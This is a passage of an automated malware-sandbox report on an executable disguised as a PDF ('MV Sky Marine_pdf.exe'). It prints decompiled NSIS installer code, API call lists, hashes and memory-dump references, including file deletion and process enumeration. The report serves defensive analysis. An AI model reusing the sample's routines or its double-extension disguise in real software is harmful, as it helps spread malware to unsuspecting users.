					 *0x7a2858 = _t47;
					SHGetFileInfoA(0x79dd58, 0, _t129 + 0x38, 0x160, 0); // executed
					E00405D24(0x7a1fa0, "NSIS Error");
					_t51 = GetCommandLineA();
					_t125 = "\"C:\\Users\\alfons\\Desktop\\MV Sky Marine_pdf.exe\" ";
					E00405D24(_t125, _t51);
					 *0x7a27a0 = GetModuleHandleA(0);
					_t54 = _t125;
					if("\"C:\\Users\\alfons\\Desktop\\MV Sky Marine_pdf.exe\" " == 0x22) {
						 *((char*)(_t129 + 0x14)) = 0x22;
						_t54 =  &M007A8001;
					}
					_t56 = CharNextA(E00405842(_t54,  *((intOrPtr*)(_t129 + 0x14))));
					 *(_t129 + 0x20) = _t56;
					goto L22;
				}
			}































                                                                                                  0x00403280
                                                                                                  0x00403284
                                                                                                  0x0040328c
                                                                                                  0x00403290
                                                                                                  0x00403295
                                                                                                  0x004032a5
                                                                                                  0x004032a8
                                                                                                  0x004032af
                                                                                                  0x004032b6
                                                                                                  0x004032b6
                                                                                                  0x004032af
                                                                                                  0x004032b8
                                                                                                  0x004032b8
                                                                                                  0x004033ce
                                                                                                  0x004033ce
                                                                                                  0x004033ce
                                                                                                  0x004033d0
                                                                                                  0x004033d2
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00403367
                                                                                                  0x0040336a
                                                                                                  0x00403372
                                                                                                  0x00403372
                                                                                                  0x00403375
                                                                                                  0x0040337a
                                                                                                  0x0040337c
                                                                                                  0x0040337c
                                                                                                  0x0040337d
                                                                                                  0x0040337d
                                                                                                  0x00403382
                                                                                                  0x00403385
                                                                                                  0x004033be
                                                                                                  0x004033c3
                                                                                                  0x004033c8
                                                                                                  0x004033cb
                                                                                                  0x004033cd
                                                                                                  0x004033cd
                                                                                                  0x004033cd
                                                                                                  0x00000000
                                                                                                  0x00403387
                                                                                                  0x00403387
                                                                                                  0x00403388
                                                                                                  0x0040338b
                                                                                                  0x00403393
                                                                                                  0x00403396
                                                                                                  0x00403398
                                                                                                  0x00403398
                                                                                                  0x00403398
                                                                                                  0x00403398
                                                                                                  0x00403396
                                                                                                  0x0040339d
                                                                                                  0x004033a3
                                                                                                  0x004033ab
                                                                                                  0x004033ae
                                                                                                  0x004033b0
                                                                                                  0x004033b0
                                                                                                  0x004033b0
                                                                                                  0x004033b0
                                                                                                  0x004033ae
                                                                                                  0x004033b5
                                                                                                  0x004033bc
                                                                                                  0x004033d6
                                                                                                  0x004033d9
                                                                                                  0x004033e2
                                                                                                  0x004033e7
                                                                                                  0x004033e7
                                                                                                  0x004033f2
                                                                                                  0x004033f8
                                                                                                  0x004033fd
                                                                                                  0x004033ff
                                                                                                  0x00403425
                                                                                                  0x0040342a
                                                                                                  0x00403434
                                                                                                  0x0040343b
                                                                                                  0x0040343f
                                                                                                  0x004034a6
                                                                                                  0x004034a6
                                                                                                  0x004034ab
                                                                                                  0x004034b1
                                                                                                  0x004034b5
                                                                                                  0x004035ca
                                                                                                  0x004035d0
                                                                                                  0x0040366d
                                                                                                  0x0040366d
                                                                                                  0x00403672
                                                                                                  0x00403675
                                                                                                  0x00403677
                                                                                                  0x00403677
                                                                                                  0x0040367f
                                                                                                  0x0040367f
                                                                                                  0x004035df
                                                                                                  0x004035e8
                                                                                                  0x004035ea
                                                                                                  0x004035ef
                                                                                                  0x004035f1
                                                                                                  0x004035f3
                                                                                                  0x004035f5
                                                                                                  0x004035f7
                                                                                                  0x004035f9
                                                                                                  0x004035fb
                                                                                                  0x0040360b
                                                                                                  0x0040360d
                                                                                                  0x0040360f
                                                                                                  0x0040361c
                                                                                                  0x0040362b
                                                                                                  0x00403633
                                                                                                  0x0040363b
                                                                                                  0x0040363b
                                                                                                  0x0040360f
                                                                                                  0x004035fb
                                                                                                  0x004035f7
                                                                                                  0x0040363f
                                                                                                  0x00403644
                                                                                                  0x0040364b
                                                                                                  0x00403659
                                                                                                  0x0040365c
                                                                                                  0x00403662
                                                                                                  0x00403664
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040364d
                                                                                                  0x00403653
                                                                                                  0x00403655
                                                                                                  0x00403657
                                                                                                  0x00403666
                                                                                                  0x00403668
                                                                                                  0x00000000
                                                                                                  0x00403668
                                                                                                  0x00000000
                                                                                                  0x00403657
                                                                                                  0x0040364b
                                                                                                  0x004034c4
                                                                                                  0x004034cb
                                                                                                  0x004034cb
                                                                                                  0x00403447
                                                                                                  0x00403496
                                                                                                  0x00403496
                                                                                                  0x004034a2
                                                                                                  0x00000000
                                                                                                  0x004034a2
                                                                                                  0x00403450
                                                                                                  0x0040345d
                                                                                                  0x00403454
                                                                                                  0x0040345a
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040345c
                                                                                                  0x0040345c
                                                                                                  0x0040345c
                                                                                                  0x00403461
                                                                                                  0x00403463
                                                                                                  0x0040346b
                                                                                                  0x004034dc
                                                                                                  0x004034de
                                                                                                  0x004034e5
                                                                                                  0x004034ed
                                                                                                  0x004034ed
                                                                                                  0x004034f8
                                                                                                  0x004034fd
                                                                                                  0x0040350c
                                                                                                  0x00403510
                                                                                                  0x00403511
                                                                                                  0x0040351a
                                                                                                  0x00403513
                                                                                                  0x00403513
                                                                                                  0x00403513
                                                                                                  0x00403520
                                                                                                  0x00403526
                                                                                                  0x0040352c
                                                                                                  0x00403534
                                                                                                  0x00403534
                                                                                                  0x00403542
                                                                                                  0x00403549
                                                                                                  0x00403552
                                                                                                  0x00403558
                                                                                                  0x00403564
                                                                                                  0x0040356a
                                                                                                  0x00403574
                                                                                                  0x0040357e
                                                                                                  0x00403584
                                                                                                  0x00403586
                                                                                                  0x00403588
                                                                                                  0x00403589
                                                                                                  0x0040358a
                                                                                                  0x0040359b
                                                                                                  0x004035a1
                                                                                                  0x004035a8
                                                                                                  0x004035ab
                                                                                                  0x004035b1
                                                                                                  0x004035b1
                                                                                                  0x004035a8
                                                                                                  0x00403586
                                                                                                  0x004035b5
                                                                                                  0x004035bb
                                                                                                  0x004035bb
                                                                                                  0x004035bb
                                                                                                  0x004035be
                                                                                                  0x004035bf
                                                                                                  0x004035c0
                                                                                                  0x004035c0
                                                                                                  0x00000000
                                                                                                  0x0040350c
                                                                                                  0x0040346d
                                                                                                  0x0040346f
                                                                                                  0x0040347a
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00403482
                                                                                                  0x0040348d
                                                                                                  0x00403492
                                                                                                  0x00000000
                                                                                                  0x00403492
                                                                                                  0x00403407
                                                                                                  0x00403413
                                                                                                  0x00403418
                                                                                                  0x0040341d
                                                                                                  0x0040341f
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004033bc
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040336c
                                                                                                  0x0040336c
                                                                                                  0x0040336c
                                                                                                  0x0040336d
                                                                                                  0x0040336d
                                                                                                  0x00000000
                                                                                                  0x0040336c
                                                                                                  0x00000000
                                                                                                  0x004032bd
                                                                                                  0x004032be
                                                                                                  0x004032ca
                                                                                                  0x004032d0
                                                                                                  0x00000000
                                                                                                  0x004032d2
                                                                                                  0x004032d4
                                                                                                  0x004032db
                                                                                                  0x004032e0
                                                                                                  0x004032e5
                                                                                                  0x004032ec
                                                                                                  0x004032f2
                                                                                                  0x00403308
                                                                                                  0x00403318
                                                                                                  0x0040331d
                                                                                                  0x00403323
                                                                                                  0x0040332a
                                                                                                  0x0040333d
                                                                                                  0x00403342
                                                                                                  0x00403344
                                                                                                  0x00403346
                                                                                                  0x0040334b
                                                                                                  0x0040334b
                                                                                                  0x0040335b
                                                                                                  0x00403361
                                                                                                  0x00000000
                                                                                                  0x00403361

                                                                                                  APIs
                                                                                                  • SetErrorMode.KERNELBASE ref: 00403295
                                                                                                  • GetVersion.KERNEL32 ref: 0040329B
                                                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032C4
                                                                                                  • #17.COMCTL32(0000000B,0000000D), ref: 004032E5
                                                                                                  • OleInitialize.OLE32(00000000), ref: 004032EC
                                                                                                  • SHGetFileInfoA.SHELL32(0079DD58,00000000,?,00000160,00000000), ref: 00403308
                                                                                                  • GetCommandLineA.KERNEL32(007A1FA0,NSIS Error), ref: 0040331D
                                                                                                  • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\MV Sky Marine_pdf.exe" ,00000000), ref: 00403330
                                                                                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\MV Sky Marine_pdf.exe" ,00409130), ref: 0040335B
                                                                                                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004033F2
                                                                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403407
                                                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403413
                                                                                                  • DeleteFileA.KERNELBASE(1033), ref: 0040342A
                                                                                                    • Part of subcall function 004060B4: GetModuleHandleA.KERNEL32(?,?,?,004032D9,0000000D), ref: 004060C6
                                                                                                    • Part of subcall function 004060B4: GetProcAddress.KERNEL32(00000000,?), ref: 004060E1
                                                                                                  • OleUninitialize.OLE32(00000020), ref: 004034AB
                                                                                                  • ExitProcess.KERNEL32 ref: 004034CB
                                                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\MV Sky Marine_pdf.exe" ,00000000,00000020), ref: 004034DE
                                                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,004091AC,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\MV Sky Marine_pdf.exe" ,00000000,00000020), ref: 004034ED
                                                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\MV Sky Marine_pdf.exe" ,00000000,00000020), ref: 004034F8
                                                                                                  • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\MV Sky Marine_pdf.exe" ,00000000,00000020), ref: 00403504
                                                                                                  • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403520
                                                                                                  • DeleteFileA.KERNEL32(0079D958,0079D958,?,007A3000,?), ref: 0040356A
                                                                                                  • CopyFileA.KERNEL32(C:\Users\user\Desktop\MV Sky Marine_pdf.exe,0079D958,00000001), ref: 0040357E
                                                                                                  • CloseHandle.KERNEL32(00000000,0079D958,0079D958,?,0079D958,00000000), ref: 004035AB
                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 00403604
                                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 0040365C
                                                                                                  • ExitProcess.KERNEL32 ref: 0040367F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Filelstrcat$ExitHandleProcess$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                                                                                                  • String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\MV Sky Marine_pdf.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\MV Sky Marine_pdf.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$~nsu
                                                                                                  • API String ID: 3469842172-4121373559
                                                                                                  • Opcode ID: fd6959f65afc166d02ab77986b710cdee00155cf2a4392c7fc2ba17e1fd47ed3
                                                                                                  • Instruction ID: 2a9d3a0459ab0a49b4f13aaa4ac5fd0070e0ff6b79a2365845b85e88f8dd116d
                                                                                                  • Opcode Fuzzy Hash: fd6959f65afc166d02ab77986b710cdee00155cf2a4392c7fc2ba17e1fd47ed3
                                                                                                  • Instruction Fuzzy Hash: 65A1D3709083416EE7216F659C49B2B7EACEF42309F04453FF941B62D2CB7C9A058A6F
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00405649, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 98%
                                                                                                  			E00405649(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E004058F8(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x7a2828 =  *0x7a2828 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405D24(0x79fda8, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E0040585E(_t72);
					} else {
						lstrcatA(0x79fda8, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x79fda8,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E00405842( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405D24(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E004059DC(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00405010(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x7a2828 =  *0x7a2828 + 1;
										} else {
											E00405010(0xfffffff1, _t72);
											E00405A72(__eflags, _t72, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405649(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x79fda8 - 0x5c;
					if( *0x79fda8 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E0040601F(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E00405817(_t72);
							E004059DC(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00405010(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00405010(0xfffffff1, _t72);
							return E00405A72(__eflags, _t72, 0);
						}
						L33:
						 *0x7a2828 =  *0x7a2828 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                                                                                                  0x00405654
                                                                                                  0x00405658
                                                                                                  0x00405661
                                                                                                  0x00405664
                                                                                                  0x00405667
                                                                                                  0x0040566f
                                                                                                  0x00405671
                                                                                                  0x00405672
                                                                                                  0x00000000
                                                                                                  0x00405672
                                                                                                  0x00405681
                                                                                                  0x00405681
                                                                                                  0x00405684
                                                                                                  0x00405687
                                                                                                  0x0040569b
                                                                                                  0x004056a2
                                                                                                  0x004056a7
                                                                                                  0x004056a9
                                                                                                  0x004056b9
                                                                                                  0x004056ab
                                                                                                  0x004056b1
                                                                                                  0x004056b1
                                                                                                  0x004056be
                                                                                                  0x004056c1
                                                                                                  0x004056cc
                                                                                                  0x004056d2
                                                                                                  0x004056d7
                                                                                                  0x004056e7
                                                                                                  0x004056e9
                                                                                                  0x004056ef
                                                                                                  0x004056f2
                                                                                                  0x004056f5
                                                                                                  0x004057b2
                                                                                                  0x004057b2
                                                                                                  0x004057b6
                                                                                                  0x004057b8
                                                                                                  0x004057b8
                                                                                                  0x004057b8
                                                                                                  0x004057b8
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004056fb
                                                                                                  0x004056fb
                                                                                                  0x00405704
                                                                                                  0x0040570a
                                                                                                  0x0040570f
                                                                                                  0x00405712
                                                                                                  0x00405714
                                                                                                  0x00405718
                                                                                                  0x0040571a
                                                                                                  0x0040571a
                                                                                                  0x00405718
                                                                                                  0x0040571d
                                                                                                  0x00405720
                                                                                                  0x00405733
                                                                                                  0x00405735
                                                                                                  0x0040573a
                                                                                                  0x00405741
                                                                                                  0x00405759
                                                                                                  0x0040575f
                                                                                                  0x00405765
                                                                                                  0x00405767
                                                                                                  0x0040578c
                                                                                                  0x00405769
                                                                                                  0x00405769
                                                                                                  0x0040576d
                                                                                                  0x00405781
                                                                                                  0x0040576f
                                                                                                  0x00405772
                                                                                                  0x0040577a
                                                                                                  0x0040577a
                                                                                                  0x0040576d
                                                                                                  0x00405743
                                                                                                  0x00405749
                                                                                                  0x0040574b
                                                                                                  0x00405751
                                                                                                  0x00405751
                                                                                                  0x0040574b
                                                                                                  0x00000000
                                                                                                  0x00405741
                                                                                                  0x00405722
                                                                                                  0x00405725
                                                                                                  0x00405727
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405729
                                                                                                  0x0040572b
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040572d
                                                                                                  0x00405731
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405791
                                                                                                  0x0040579b
                                                                                                  0x004057a1
                                                                                                  0x004057a1
                                                                                                  0x004057ac
                                                                                                  0x00000000
                                                                                                  0x004057ac
                                                                                                  0x004056c3
                                                                                                  0x004056ca
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405689
                                                                                                  0x00405689
                                                                                                  0x0040568b
                                                                                                  0x004057bc
                                                                                                  0x004057bf
                                                                                                  0x004057c2
                                                                                                  0x00405814
                                                                                                  0x00405814
                                                                                                  0x00405814
                                                                                                  0x004057c4
                                                                                                  0x004057c7
                                                                                                  0x004057d2
                                                                                                  0x004057d7
                                                                                                  0x004057d9
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004057dc
                                                                                                  0x004057e2
                                                                                                  0x004057e8
                                                                                                  0x004057ee
                                                                                                  0x004057f0
                                                                                                  0x00000000
                                                                                                  0x0040580c
                                                                                                  0x004057f2
                                                                                                  0x004057f6
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004057fb
                                                                                                  0x00000000
                                                                                                  0x00405802
                                                                                                  0x004057c9
                                                                                                  0x004057c9
                                                                                                  0x00000000
                                                                                                  0x004057c9
                                                                                                  0x00405691
                                                                                                  0x00405695
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405695

                                                                                                  APIs
                                                                                                  • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,7519F560), ref: 00405667
                                                                                                  • lstrcatA.KERNEL32(0079FDA8,\*.*,0079FDA8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,7519F560), ref: 004056B1
                                                                                                  • lstrcatA.KERNEL32(?,00409010,?,0079FDA8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,7519F560), ref: 004056D2
                                                                                                  • lstrlenA.KERNEL32(?,?,00409010,?,0079FDA8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,7519F560), ref: 004056D8
                                                                                                  • FindFirstFileA.KERNEL32(0079FDA8,?,?,?,00409010,?,0079FDA8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,7519F560), ref: 004056E9
                                                                                                  • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 0040579B
                                                                                                  • FindClose.KERNEL32(?), ref: 004057AC
                                                                                                  Strings
                                                                                                  • "C:\Users\user\Desktop\MV Sky Marine_pdf.exe" , xrefs: 00405649
                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405653
                                                                                                  • \*.*, xrefs: 004056AB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                  • String ID: "C:\Users\user\Desktop\MV Sky Marine_pdf.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                  • API String ID: 2035342205-3079480097
                                                                                                  • Opcode ID: 5f788f06b89a6f593caa0759886f33c3c04a37fdfb866b5ecdaca1cc1665d1f8
                                                                                                  • Instruction ID: 0eb855ff9a2b1247dbd44d963b35209b971b417283db5505a9d7fa508270b5e2
                                                                                                  • Opcode Fuzzy Hash: 5f788f06b89a6f593caa0759886f33c3c04a37fdfb866b5ecdaca1cc1665d1f8
                                                                                                  • Instruction Fuzzy Hash: B251B331404A45A6DF227B218C89BBF3A68DF82714F54847BF954761D2C73C4982EF6E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040601F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0040601F(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x7a0df0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x7a0df0;
			}




                                                                                                  0x0040602a
                                                                                                  0x00406033
                                                                                                  0x00000000
                                                                                                  0x00406040
                                                                                                  0x00406036
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • FindFirstFileA.KERNELBASE(?,007A0DF0,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,0040593B,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,00000000,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,C:\Users\user\AppData\Local\Temp\nssBDFE.tmp,?,?,7519F560,0040565D,?,C:\Users\user\AppData\Local\Temp\,7519F560), ref: 0040602A
                                                                                                  • FindClose.KERNEL32(00000000), ref: 00406036
                                                                                                  Strings
                                                                                                  • C:\Users\user\AppData\Local\Temp\nssBDFE.tmp, xrefs: 0040601F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nssBDFE.tmp
                                                                                                  • API String ID: 2295610775-1451364421
                                                                                                  • Opcode ID: bc2cfeb157d82695ec663282c85cb8c9d1102ce5ec4d2213d5806e87fc238169
                                                                                                  • Instruction ID: 364cb9d6a100f6bd6ba80fb0995bd87ec04d479e3a2a5af2b7d6f24bd86a5df0
                                                                                                  • Opcode Fuzzy Hash: bc2cfeb157d82695ec663282c85cb8c9d1102ce5ec4d2213d5806e87fc238169
                                                                                                  • Instruction Fuzzy Hash: 03D01272A881205BC32097786D0C94B7A599B453317114F32B926F62E1C638AC6286AE
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 10004347, Relevance: 4.6, APIs: 3, Instructions: 52processCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,034CF0BF,873D1860,034CF0BF,5C7BF6E9,034CF0BF,EA31D3B6), ref: 1000438C
                                                                                                  • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 100043B0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.235472130.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.235453419.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235460951.0000000010001000.00000020.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235467539.0000000010002000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.235488746.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                  • String ID:
                                                                                                  • API String ID: 2353314856-0
                                                                                                  • Opcode ID: f11ef60f4f72861f0e902d52d03d54262a964c47fcc8cc29cceff05a9811adf3
                                                                                                  • Instruction ID: 949b434bc18860b61ca34e2c4fc247fedfafb0af8dbffc8aab7b2c9691e331bf
                                                                                                  • Opcode Fuzzy Hash: f11ef60f4f72861f0e902d52d03d54262a964c47fcc8cc29cceff05a9811adf3
                                                                                                  • Instruction Fuzzy Hash: A4113CB4D0014DFFEB10DFB1CC49AAEBBB8EF05380F1255A5E914E2154EB305B509B59
                                                                                                  Uniqueness

